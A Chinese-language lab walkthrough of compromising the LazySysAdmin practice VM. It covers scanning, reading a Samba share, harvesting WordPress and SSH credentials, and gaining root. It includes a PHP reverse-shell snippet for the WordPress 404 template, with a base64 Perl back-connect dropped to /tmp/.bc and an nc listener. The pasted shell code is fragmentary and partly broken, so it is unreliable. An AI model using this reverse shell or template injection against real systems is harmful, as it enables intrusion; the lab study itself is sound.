靶场渗透（三）——lazysysadmin渗透

测试环境

靶机：lazysysadmin打开虚拟机后设为nat模式
攻击机：kali,windows10
 

信息收集

• nmap扫描ip及开放端口和服务，发现开启了samba服务

• 扫描目录
kali：dirb http://192.168.111.133

渗透测试

• 打开刚才扫描得到的robots.txt页面，得到了另外一个目录：/Backnode_files/,访问该目录发现该网站
的中间件用的是apache2.4.7系统为ubuntu

• 根据dirb扫描的结果可知该网站是wordpress，且还有phpmyadmin，利用kali自带的wpscan扫描漏洞
该工具可以识别网站所使用的wordpress版本，并且给出对应的漏洞和漏洞利用脚本
该工具相关使用教程：https://www.cnblogs.com/WangYiqiang/p/9490869.html

• 用enum4linux工具扫描该网站sumba共享服务的重要信息,根据扫描结果我们可知sumba共享文件名为
share$,lazysysadmin域的密码长度为5

• 既然有samba服务，则直接访问该目录，看看是否有可用信息
windows下：\\192.168.111.133\share$
kali下：smbclient //192.168.111.133/share$(密码为空)

• 查看wordpress配置文件wp-config.php,找到数据库连接用户名和密码Admin：TogieMYSQL12345^^
查看todolist.txt文件发现禁止用户使用本地文件浏览器查看web根目录
查看deets.txt发现了ssh连接密码12345

• 在wordpress页面发现用户名是togie，通过ssh连接，提升到root权限

思路二

• 在samba分享的wordpress目录里面发现了登陆页面wp-login.php,再根据在wp-config.php找到的信息
登陆

• 向404.php页面模板插入PHP反弹shell的代码，nc监听端口python切换到/bin/bash:nc -lvp 1234

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.111.134';
$port = '4444';
$CHUNK_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a;w;id;/bin/sh -i';
$darmon = 0;
$debug = 0;

'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>

• su 提权到togie然后提权到root

总结

收获：
• 学习到一个上传shell的新思路：通过网站引用的模板存在的漏洞上传
• 可以根据网站服务器开启的服务进行渗透，如本次的samba服务
• 两个新工具：wpscan，enum4linux
思路：
• 通过sabma共享文件里面的用户密码直接ssh登陆提权
• 通过samba共享文件里面的网站密码登陆网站后台管理系统，更改网站页面模板获取shell